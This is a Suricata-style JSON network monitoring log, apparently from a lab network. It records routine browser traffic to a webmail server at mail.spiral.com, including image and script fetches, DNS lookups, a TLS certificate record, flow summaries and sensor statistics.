{"timestamp":"2020-02-29T00:27:19.465999+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reply.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":248}} {"timestamp":"2020-02-29T00:27:19.465837+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":192},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/personal-inv.png","state":"CLOSED","stored":false,"size":192,"tx_id":1}} {"timestamp":"2020-02-29T00:27:19.467776+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reply.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":248},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reply.png","state":"CLOSED","stored":false,"size":248,"tx_id":1}} {"timestamp":"2020-02-29T00:27:19.479778+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/forward.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":253}} 
{"timestamp":"2020-02-29T00:27:19.480640+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312}} {"timestamp":"2020-02-29T00:27:19.481302+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/delete.png","state":"CLOSED","stored":false,"size":312,"tx_id":2}} {"timestamp":"2020-02-29T00:27:19.481869+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1737}} 
{"timestamp":"2020-02-29T00:27:19.489678+0000","flow_id":947000290277582,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39733,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":41386,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:27:19.522783+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/forward.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":253},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/forward.png","state":"CLOSED","stored":false,"size":253,"tx_id":2}} {"timestamp":"2020-02-29T00:27:19.598174+0000","flow_id":947000290277582,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39733,"proto":"UDP","dns":{"type":"answer","id":41386,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:27:19.598174+0000","flow_id":947000290277582,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39733,"proto":"UDP","dns":{"type":"answer","id":41386,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:27:19.672819+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/showMessage","http_user_agent":"Mozilla\/5.0 
(X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1843}} {"timestamp":"2020-02-29T00:27:19.672819+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/showMessage","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1843},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/showMessage","state":"CLOSED","stored":false,"size":244,"tx_id":3}} {"timestamp":"2020-02-29T00:27:19.693191+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/showMessage","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1843},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/showMessage","state":"CLOSED","stored":false,"size":4807,"tx_id":3}} 
{"timestamp":"2020-02-29T00:27:19.695078+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1737},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/loading.gif","state":"CLOSED","stored":false,"size":1737,"tx_id":3}} {"timestamp":"2020-02-29T00:27:19.695774+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_collapsed.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234}} {"timestamp":"2020-02-29T00:27:19.696292+0000","flow_id":1068792677898677,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53184,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/download.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":297}} 
{"timestamp":"2020-02-29T00:27:19.697768+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_collapsed.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/arrow_collapsed.png","state":"CLOSED","stored":false,"size":234,"tx_id":4}} {"timestamp":"2020-02-29T00:27:19.741338+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/print.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349}} {"timestamp":"2020-02-29T00:27:19.741554+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":485}} 
{"timestamp":"2020-02-29T00:27:23.000176+0000","event_type":"stats","stats":{"uptime":15295,"capture":{"kernel_packets":142546,"kernel_drops":0},"decoder":{"pkts":142586,"bytes":97913480,"invalid":196,"ipv4":140985,"ipv6":10,"ethernet":142586,"raw":0,"null":0,"sll":0,"tcp":135382,"udp":5392,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7090144},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2929,"ssn_memcap_drop":0,"pseudo":356,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2945,"synack":2936,"rst":1225,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":149,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1932,"ftp":0,"smtp":0,"tls":788,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":108,"dcerpc_udp":0,"dns_udp":2467,"failed_udp":116},"tx":{"http":5076,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2551}},"flow_mgr":{"closed_pruned":2900,"new_pruned":17,"est_pruned":2551,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":11220,"memcap_state":0,"memcap_global":0},"http":{"memuse":105176,"memcap":0}}} 
{"timestamp":"2020-02-29T00:27:23.186394+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":485},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/plus.png","state":"CLOSED","stored":false,"size":485,"tx_id":4}} {"timestamp":"2020-02-29T00:27:23.186770+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/newwin.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":316}} {"timestamp":"2020-02-29T00:27:23.188334+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/print.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/print.png","state":"CLOSED","stored":false,"size":349,"tx_id":5}} {"timestamp":"2020-02-29T00:27:23.188587+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_expanded.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227}} {"timestamp":"2020-02-29T00:27:24.178077+0000","flow_id":1770852327399578,"in_iface":"eth0","event_type":"tls","src_ip":"192.168.10.130","src_port":34308,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","tls":{"subject":"CN=mail.spiral.com","issuerdn":"CN=ChangeMe","fingerprint":"4a:cf:f5:f8:ce:55:c7:45:08:c5:21:a0:2d:b6:f5:0f:3c:e0:a3:17","sni":"mail.spiral.com","version":"TLS 1.2","notbefore":"2020-02-28T18:40:24","notafter":"2030-02-25T18:40:24"}} {"timestamp":"2020-02-29T00:27:24.701651+0000","flow_id":1068792677898677,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53184,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/download.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":297},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/download.png","state":"CLOSED","stored":false,"size":297,"tx_id":0}} {"timestamp":"2020-02-29T00:27:26.000229+0000","flow_id":1691541457050508,"event_type":"flow","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":35,"pkts_toclient":56,"bytes_toserver":8649,"bytes_toclient":66438,"start":"2020-02-29T00:26:19.957324+0000","end":"2020-02-29T00:26:25.439540+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:26.000477+0000","flow_id":1289824575955109,"event_type":"flow","src_ip":"192.168.10.81","src_port":53152,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":4,"pkts_toclient":2,"bytes_toserver":272,"bytes_toclient":140,"start":"2020-02-29T00:26:20.008357+0000","end":"2020-02-29T00:26:25.160374+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"13","tcp_flags_ts":"13","tcp_flags_tc":"13","syn":true,"fin":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:27:26.000669+0000","flow_id":1460171568849225,"event_type":"flow","src_ip":"192.168.10.81","src_port":53156,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":7,"bytes_toserver":1862,"bytes_toclient":1979,"start":"2020-02-29T00:26:20.008521+0000","end":"2020-02-29T00:26:25.089944+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:26.000890+0000","flow_id":371298575065439,"event_type":"flow","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":30,"bytes_toserver":5040,"bytes_toclient":31417,"start":"2020-02-29T00:26:20.008543+0000","end":"2020-02-29T00:26:25.702106+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:26.001002+0000","flow_id":1225885397469246,"event_type":"flow","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":83,"pkts_toclient":121,"bytes_toserver":13296,"bytes_toclient":151458,"start":"2020-02-29T00:26:14.837694+0000","end":"2020-02-29T00:26:25.698980+0000","age":11,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:27:26.001137+0000","flow_id":1673743112610025,"event_type":"flow","src_ip":"192.168.10.81","src_port":53154,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":7,"bytes_toserver":1906,"bytes_toclient":2538,"start":"2020-02-29T00:26:20.008425+0000","end":"2020-02-29T00:26:25.432430+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:26.800225+0000","flow_id":571491300029921,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46613,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":46428,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:27:26.826777+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/newwin.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":316},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/newwin.png","state":"CLOSED","stored":false,"size":316,"tx_id":5}} {"timestamp":"2020-02-29T00:27:26.908921+0000","flow_id":571491300029921,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46613,"proto":"UDP","dns":{"type":"answer","id":46428,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:27:26.908921+0000","flow_id":571491300029921,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46613,"proto":"UDP","dns":{"type":"answer","id":46428,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:27:26.991245+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6769}} {"timestamp":"2020-02-29T00:27:27.089615+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6769},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":23886,"tx_id":6}} 
{"timestamp":"2020-02-29T00:27:27.091932+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/message-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2622}} {"timestamp":"2020-02-29T00:27:27.094641+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/message-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2622},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/message-dimp.js","state":"CLOSED","stored":false,"size":10354,"tx_id":7}} {"timestamp":"2020-02-29T00:27:27.113034+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/js\/textarearesize.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":833}} {"timestamp":"2020-02-29T00:27:27.116099+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_expanded.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/arrow_expanded.png","state":"CLOSED","stored":false,"size":227,"tx_id":6}} {"timestamp":"2020-02-29T00:27:27.116343+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imageupload.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":867}} 
